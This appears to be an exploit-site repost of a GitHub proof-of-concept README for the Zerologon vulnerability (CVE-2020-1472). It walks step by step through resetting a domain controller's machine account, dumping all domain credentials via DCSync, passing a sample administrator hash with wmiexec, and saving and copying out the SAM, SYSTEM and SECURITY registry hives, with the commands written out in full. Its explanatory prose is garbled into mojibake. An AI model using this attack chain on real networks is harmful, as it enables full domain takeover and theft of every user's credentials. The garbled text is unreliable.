## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MSTXQ17-CVE-2020-1472
# CVE-2020-1472 POC
mac рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ proxychains рдкреНрд░реЙрдХреНрд╕реА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ Windows рдбреЛрдореЗрди рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рдЗрд╕ рднреЗрджреНрдпрддрд╛ рдХреЛ рджреЛрд╣рд░рд╛рдирд╛ред
## Environment
DC (рдореБрдЦреНрдп рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ):

Domain User (рдбреЛрдореЗрди рд╕рджрд╕реНрдп рд╣реЛрд╕реНрдЯ):
gost рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕реАрдзреЗ SOCKS5 рдлреЙрд░рд╡рд░реНрдб рдкреНрд░реЙрдХреНрд╕реА рд╕реЗрдЯ рдХрд░рдирд╛ред

Attack Hacker (рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди):
proxychains4 рд╕реЗрдЯ рдХрд░реЗрдВ
root@kitploit:~
vim /Users/xq17/.proxychains/proxychains.conf
ProxyList рд╕реВрдЪреА рдореЗрдВ рдЬреЛрдбрд╝реЗрдВ
> [ProxyList] socks5 10.211.55.42 8099
Attack Tools (рд╣рдорд▓реЗ рдХреЗ рдЙрдкрдХрд░рдг):
root@kitploit:~
1.git clone https://github.com/mstxq17/cve-2020-1472.git
2.pip3 install -r requirements.txt
рдпрджрд┐ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдкрд░ рдпрд╣ рддреНрд░реБрдЯрд┐ рдЖрддреА рд╣реИ:

рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ impacket рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рд╕рдорд╕реНрдпрд╛ рд╣реИред impacket рдореЙрдбреНрдпреВрд▓ рдХреЛ рдЕрдирдЗрдВрд╕реНрдЯреЙрд▓ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ рдФрд░ GitHub рдкрд░ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдВред
root@kitploit:~
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket && pip3 install .
рд╕рдорд╕реНрдпрд╛ рд╣рд▓ рд╣реЛ рдЬрд╛рдПрдЧреАред
C# рд╕рдВрд╕реНрдХрд░рдг рдЙрдкрдХрд░рдг: https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon
## Exploit steps
1. рдкрд╣рд▓реЗ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдбреЛрдореЗрди рдорд╢реАрди рдЦрд╛рддреЗ рдХрд╛ рд╣реИрд╢ рдирд┐рдХрд╛рд▓рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ, рддрд╛рдХрд┐ рдмрд╛рдж рдореЗрдВ рд╕рдВрд╢реЛрдзрди рдХреЗ рд╕рд╛рде рддреБрд▓рдирд╛ рдХреА рдЬрд╛ рд╕рдХреЗред
root@kitploit:~
proxychains4 secretsdump.py test.local/Administrator:'123QWEqwe!@#'@10.211.55.38 -just-dc-user "DC$"
рдпрд╛ рдЙрджреНрдзрд░рдг рд╣рдЯрд╛рдПрдВ, рд▓реЗрдХрд┐рди рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ Linux рдореЗрдВ $ рдПрдХ рдЪрд░ рдХрд╛ рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдХрд░рддрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдЗрд╕реЗ рдПрд╕реНрдХреЗрдк рдХрд░рдирд╛ рдпрд╛рдж рд░рдЦреЗрдВред
proxychains4 secretsdump.py test.local/Administrator:'123QWEqwe!@#'@10.211.55.38 -just-dc-user DC\$

2. `zerologon_tester.py` рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рднреЗрджреНрдпрддрд╛ рдореМрдЬреВрдж рд╣реИ рдпрд╛ рдирд╣реАрдВ
`python3 zerologon_tester.py DC 10.211.55.38`

Success рд╡рд╛рдкрд╕ рдЖрддрд╛ рд╣реИ, рдЬреЛ рднреЗрджреНрдпрддрд╛ рдХреА рдЙрдкрд╕реНрдерд┐рддрд┐ рджрд░реНрд╢рд╛рддрд╛ рд╣реИред
3. `cve-2020-1472-exploit.py` рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдорд╢реАрди рдЦрд╛рддрд╛ рд░реАрд╕реЗрдЯ рдХрд░реЗрдВ
`python3 cve-2020-1472-exploit.py dc$ 10.211.55.38`

4. рдлрд┐рд░ рд╕реЗ рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдорд╢реАрди рдкрд╛рд╕рд╡рд░реНрдб рдЦрд╛рд▓реА рд╣реЛ рдЧрдпрд╛ рд╣реИ рдпрд╛ рдирд╣реАрдВред

5. рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдХреЗ рдорд╢реАрди рдЦрд╛рддреЗ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ DCSync рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдбреЛрдореЗрди рдореЗрдВ рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдирд┐рдХрд╛рд▓реЗ рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВ
рд╕рд┐рджреНрдзрд╛рдВрдд:
> 
>
> DRS (рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рд░реЗрдкреНрд▓рд┐рдХреЗрд╢рди рд╕рд░реНрд╡рд┐рд╕) рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ IDL_DRSGetNCChanges рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рд╕реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХреЙрдкреА рдХрд░рдирд╛ред
` proxychains4 secretsdump.py test.local/dc\some-email@example.com -no-pass`

6. DC$ рдорд╢реАрди рдЦрд╛рддреЗ рдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдкреБрдирд░реНрд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдВ рдЗрд╕рдХреЗ рджреНрд╡рд╛рд░рд╛
`proxychains4 secretsdump.py test.local/dc\some-email@example.com -no-pass -just-dc | grep 'Administrator'`
рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХрд╛ рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ


рдлрд┐рд░ wmic рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ, рд╣реИрд╢ рдкрд╛рд╕ рдХрд░реЗрдВ рдФрд░ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдореЗрдВ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдзрд┐рдХрд╛рд░ (рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ) рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
root@kitploit:~
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/some-email@example.com
рдлрд┐рд░ рдХреНрд░рдорд╢рдГ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ, рд╕реНрдерд╛рдиреАрдп рдорд╢реАрди рд╕реЗ SAM рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ MAC рд╕рд╛рдЗрдб рдкрд░ рдХреЙрдкреА рдХрд░реЗрдВ
root@kitploit:~
- reg save HKLM\SYSTEM system.save
- reg save HKLM\SAM sam.save
- reg save HKLM\SECURITY security.save
- get system.save
- get sam.save
- get security.save
- del /f system.save
- del /f sam.save
- del /f security.save
## Question
**рдПрдХрд▓ рдбреЛрдореЗрди рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ:**
рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИред рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдХреЛ рдкреБрдирд░рд╛рд░рдВрдн рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рдХреЛрдИ рдЕрд╕рд╛рдорд╛рдиреНрдпрддрд╛ рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдбреЛрдореЗрди рд╕рджрд╕реНрдп рдорд╢реАрдиреЛрдВ рдХреЗ DNS рдореЗрдВ рд╕рдорд╕реНрдпрд╛ рд╣реЛрддреА рд╣реИ, рдЬреЛ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдирд╣реАрдВ рдХрд░рддреАред

рдкрд╛рд╕рд╡рд░реНрдб рдкреБрдирд░реНрд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж:

**рджреЛрд╣рд░реЗ рдбреЛрдореЗрди рд╡рд╛рддрд╛рд╡рд░рдг, рдПрдХ рдореБрдЦреНрдп рдбреЛрдореЗрди DC, рдПрдХ рдмреИрдХрдЕрдк рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ DC01:**

рдкреНрд░рд╛рд░рдВрдн рдореЗрдВ рджреЛрдиреЛрдВ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХреЛрдВ рдХреЗ рдорд╢реАрди рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдкрд░, рд╡реЗ рдЕрд▓рдЧ-рдЕрд▓рдЧ рдкрд╛рдП рдЧрдПред

рд╕рд╣рд╛рдпрдХ рдбреЛрдореЗрди рдкрд░ рд╣рдорд▓рд╛ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд┐рдпрд╛ рдЧрдпрд╛, рдЬрд┐рд╕рд╕реЗ рдореБрдЦреНрдп рдбреЛрдореЗрди рдкреНрд░рднрд╛рд╡рд┐рдд рдирд╣реАрдВ рд╣реБрдЖ, рдФрд░ ntdis.dist рдбреЗрдЯрд╛ рднреА рд╕рд┐рдВрдХ рд╣реЛ рдЧрдпрд╛ред

рдореБрдЦреНрдп рдбреЛрдореЗрди рдкрд░ рд╣рдорд▓рд╛ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд┐рдпрд╛ рдЧрдпрд╛, `net time /domain` рдФрд░ рдПрдХрд▓ рдбреЛрдореЗрди рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рднреА рддреНрд░реБрдЯрд┐ рд╣реЛрдЧреА, рд▓реЗрдХрд┐рди рдкрд╛рд╕рд╡рд░реНрдб рдареАрдХ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж рддреБрд░рдВрдд рд╡рд╛рдкрд╕ рдЖ рдЧрдпрд╛ред
рдирдпрд╛ рдЦрд╛рддрд╛ рдмрдирд╛рдиреЗ рдкрд░ рд╕реАрдзреЗ рд╕рд┐рдВрдХ рд╣реЛ рд╕рдХрддрд╛ рд╣реИ

рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓рдиреЗ рдкрд░ рднреА рд╕рд┐рдВрдХ рдкреНрд░рднрд╛рд╡рд┐рдд рдирд╣реАрдВ рд╣реЛрддрд╛ред
**рд╡реНрдпрдХреНрддрд┐рдЧрдд рд░реВрдк рд╕реЗ, рдореБрдЭреЗ рдЕрдм рддрдХ рдбреЛрдореЗрди рд╕реЗ рдмрд╛рд╣рд░ рдирд┐рдХрд▓рдиреЗ рдХреА рдХреЛрдИ рд╕рдорд╕реНрдпрд╛ рдирд╣реАрдВ рдорд┐рд▓реА рд╣реИред рд╕реБрдЭрд╛рд╡ рд╣реИ рдХрд┐ рдЖрдк рдореЗрд░реЗ рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд╛ рдПрдХ рдмрд╛рд░ рдкрд╛рд▓рди рдХрд░реЗрдВред рдпрджрд┐ рдХреЛрдИ рд╕рдорд╕реНрдпрд╛ рд╣реИ, рддреЛ рдХреГрдкрдпрд╛ рдореБрдЭрд╕реЗ рдЪрд░реНрдЪрд╛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдВрдХреЛрдЪ рди рдХрд░реЗрдВ!**
## Reference
рдиреЗрдЯрд▓реЛрдЧреЙрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рднреЗрджреНрдпрддрд╛ (CVE-2020-1472) рд╕рд┐рджреНрдзрд╛рдВрдд рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдФрд░ рд╕рддреНрдпрд╛рдкрди
рдЪреАрдиреА рдкреАрдбреАрдПрдл рд╕рдВрд╕реНрдХрд░рдг
NAXG\CVE-2020-1472
рджреЛрд╣рд░реЗ рдбреЛрдореЗрди рд╡рд╛рддрд╛рд╡рд░рдг рдХреА рд╕реНрдерд╛рдкрдирд╛